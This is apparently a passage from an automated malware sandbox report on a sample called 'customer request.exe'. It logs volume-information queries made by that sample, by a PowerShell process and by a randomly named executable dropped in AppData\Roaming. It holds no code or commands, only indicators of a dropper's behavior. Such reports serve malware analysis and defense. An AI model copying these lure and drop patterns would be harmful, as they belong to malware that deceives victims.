Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Users\user\Desktop\customer request.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Queries volume information: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
